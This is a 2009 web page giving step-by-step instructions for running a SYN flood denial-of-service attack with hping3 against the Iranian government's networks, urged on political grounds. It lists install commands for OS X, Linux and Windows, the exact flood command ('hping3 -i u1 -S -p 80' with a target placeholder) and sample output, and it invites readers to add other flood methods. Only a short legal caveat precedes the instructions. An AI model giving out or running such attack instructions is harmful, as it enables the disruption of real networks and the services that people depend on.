dMK, 'xNMl
kMMMKkxKMMMWo
;MMMMMMMMMMMMX; ..;lc'
.0MMMMMMMMMMMM0' .OMMMMMMWKO:;;.
.NMMMMMMMMMMMMMMMx. oKMMMMMMMMMMMMMMXl'
cWMMMMMMMMMMMMMMMMKxocox0NWWMMMMMMMMMMMMMMMMMMxll
,KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.
,WMMMMMMMMMMMMMMMMMMMKdc;'..';lxXMMMMMMMMMMMMW'
.kWMMMMMMMMMMMMMMMMXc. .;l; cc' .lNMMMMMMMMM0
OMMMMMMMMMMMMMMMMN: c0MMMk XMMWO; lWMMMMMM0.
xWMMMMMMMMMMMMMMX. 'XMMMMMk XMMMMMK. 'WMMMMM'
.WMMMMMMMMMMMMM, .WMMMMMMk XMMMMMMN. :MMMMMk
.;ONMMMMMMMMMK kMMMMMMMk KMMMMMMMo NMMMMx
xMMMMMMMM0 0MMMMMNo .dWMMMMMx NMMMMW
.WMMMMMMMW. :MMMWl . . .dWMMM, 'MMMMMWl:'
.oMMMMMMMMO lNo ;Kk XO' oN: KMMMMMMMMK
.xM0OWKMMM0. ,KMMk XMM0' 'KMMMMMMMWo
. lNMMWd. :d0o kOo; .kMMMMMMMMMk
'NMMMMKo;. ..:dXMMMMMMMMMMMMK.
.WMMMMMMMMWNWWMMMMMMMMMMMMMMMMMMNd:.
,xOWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK
:0WMMMMMMMWOKMMMMMMMMMMMMMMMMMWc.
loxXOdc. lMMMMMMMMMMMMMMMXkx.
.NMMMMMMMMMMMMN'
.,;:dddkOKWMl
,
So you want to mount a "SYN flood" attack against the Iranian Government (Regime). In the interest of expediting this operation I will leave the specific details of what a SYN flood attack is as an excercise for the reader. For now I will give you step-by-step instructions on how to obtain the necessary tools, installation and then deploying the attack. You will need a working knowledge of UNIX/Linux/Windows to get this going. If you are not comfortable in a command shell, well, START LEARNING!
Caveat - doing this against any network asset that is not owned by you, or is not an enemy combatant (whatever that means in cyberwarfare) is punishable by law. I relate this information to you now because it may be a useful tool in helping the Iranians rid themselves of an oppressive regime. Don't be an idiot.
What you will need:
Ok people. You will need to have the OS X Developer Tools installed. You can find these on your OS X installation CD/DVD that came with your computer. (Do a custom install and then check the Developer Tools box - no it wont hose your current OS install).
You can also get the Developer Tools via a free download from Apple (You will need an Apple ID to login - use the same ID you use for iTunes). Get it here.
Once you have the developer tools installed restart your computer.
Now we need to install the MacPorts software (an "app store" for Unix - similar to apt-get or rpm if you are familiar with Linux). Get it here.
Now that you have MacPorts installed we can now install hping3. Here's where we get into the nitty-gritty of a command shell.
Open Terminal (/Applications/Utilities/Terminal) and type:
~% sudo port install hping3
You will then be prompted for your password. Enter it and press return. hping3 will now install.
Once hping3 is installed you can start flooding an IP address or URL. Here's how it's done:
~% sudo hping3 -i u1 -S -p 80 IP-ADDRESS-OR-HOSTNAME
Where IP-ADDRESS-OR-HOSTNAME is replaced with the IP address or web address of the target host.
Again, you will be prompted to enter your password. Once you do you will be presented with something that looks like this:
len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms len=44 ip=72.32.92.32 ttl=48 DF id=0 sport=80 flags=SA seq=0 win=5840 rtt=0.0 ms . . .
That is hping3 doing it's thing. It's a good thing. If you want to gracefully stop the attack hit CONTROL+C. Otherwise, just quit the Terminal application.
Open a command shell and install hping3 by entering the command:
~% sudo aptitude install hping3
Then initiate the attack by entering:
~% sudo hping3 -i u1 -S -p 80 IP-ADDRESS-OR-HOSTNAME
Download hping2 binary for Windows (Sorry, XP only. No Vista or Win7). Get it here.
Extract the archive and locate hping2.exe. Run this executable via the command prompt.
~% sudo hping3 -i u1 -S -p 80 IP-ADDRESS-OR-HOSTNAME
I realize that there are many other ways to mount a Denial of Service (DoS) attack. hping3 is a powerfull tool that can also be used to deploy not only SYN attacks, but also ICMP, HTTP and UDP attacks. I don't have time to make a walkthrough that has instructions for everything. I welcome contributions to this document.
2009 Connor Dickie. connord@media.mit.edu, @c0nn0r This resource is located at http://web.media.mit.edu/~connord/iran/